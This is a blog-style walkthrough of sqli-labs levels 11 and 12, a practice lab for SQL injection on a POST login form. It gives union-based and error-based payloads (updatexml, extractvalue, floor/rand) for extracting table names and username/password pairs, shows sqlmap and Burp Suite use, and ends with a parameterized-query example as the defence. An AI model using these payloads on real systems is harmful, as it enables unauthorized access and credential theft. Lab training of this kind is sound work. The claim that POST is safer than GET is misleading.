sqlilabs less-11~12
2022-07-01 14:06:00 【It's always late at night.】
less-11

This level is a login form. Check the page source to see whether it gives away any other information.

From the form you can guess roughly what the login SQL statement looks like:
select * from table where uname = 'username' and passwd = 'password'
Next, work out what type of injection it is.
The blue text on the page reads as follows:
You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use
near '1' LIMIT 0,1' at line 1
So it is the single-quote type.
Revise the guessed SQL statement accordingly:
select username,password from table where uname = 'input_username' and passwd = 'input_password'

Blue text:
The used SELECT statements have a different number of columns


Blue text:
FUNCTION security.databsse does not exist
This gives the database name: security.


1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

1' union select 1,group_concat(username,password) from users #

The input here is sent in a POST request.
Background:
POST and GET are both used to fetch web content, but POST can carry a large amount of data while GET is limited to a small amount. Data sent with GET is displayed in the browser and POST data is not, so POST is relatively safer.
So you can still use Burp Suite:
capture the request and send it to Repeater to work on it there.
sqlmap is another option.
Copy the request captured in Burp Suite into a file.


After the scan:
List the databases: --dbs
Press Enter here.

Show the current database: --current-db


List the tables in security


List the columns of the users table in the security database


List the column values of the users table in the security database

Later, I found that this level is error-based,
so I tried that as well.
- updatexml function
1' and updatexml(1,(concat(0x7c,(select database()))),1)#

- extractvalue function
1' and extractvalue(1,concat(0x7c,(select database())))#

- floor and count(*)
1' union select count(*),concat((select database()),floor(rand()*2))a from information_schema.tables group by a#

1' union select count(*),str(concat((select database()),floor(rand()*2)),utf8)a from information_schema.tables group by a#

Pick any one of them to continue:
1' and updatexml(1,(concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema = database()))),1)#

1' union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema =database()),floor(rand()*2))a from information_schema.tables group by a#

less-12
less-12 is almost the same as less-11; only the injection point is different.
less-12 uses a double quotation mark with a parenthesis: ")
select username,password from users where uname=("") and passwd=("")
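
For the defensive side of what less-11 shows, here is an added example (not from the original post or the sqli-labs source) that runs the same inputs through a string-concatenated login query and a parameterized one. It assumes an in-memory sqlite3 database in place of the lab's MariaDB; the sample rows and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the lab's MariaDB.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Dumb", "Dumb"), ("O'Brien", "s3cret")])
    return conn

def login_concat(conn, uname, passwd):
    # Same shape as the statement guessed for less-11: input pasted between quotes.
    sql = ("SELECT username, password FROM users WHERE username='" + uname +
           "' AND password='" + passwd + "' LIMIT 0,1")
    return conn.execute(sql).fetchone()

def login_bound(conn, uname, passwd):
    # Placeholders keep the input out of the SQL text entirely.
    sql = ("SELECT username, password FROM users "
           "WHERE username=? AND password=? LIMIT 0,1")
    return conn.execute(sql, (uname, passwd)).fetchone()

def classify(login, conn, uname, passwd):
    """Return 'row', 'no-row' or 'sql-error' for one login attempt."""
    try:
        return "row" if login(conn, uname, passwd) else "no-row"
    except sqlite3.Error:
        return "sql-error"

def audit(login):
    # Inputs: a valid login, the quote probe from less-11, a legitimate
    # name that contains a quote, and the less-12 style delimiter.
    conn = make_db()
    cases = [("Dumb", "Dumb"), ("Dumb", "1'"),
             ("O'Brien", "s3cret"), ("Dumb", '1")')]
    return [classify(login, conn, u, p) for u, p in cases]

if __name__ == "__main__":
    print("concat:", audit(login_concat))
    print("bound: ", audit(login_bound))
```

With concatenation, a quote in the input changes the statement itself, so even the legitimate user O'Brien cannot log in; with bound parameters every input is compared as plain data and no SQL error reaches the page.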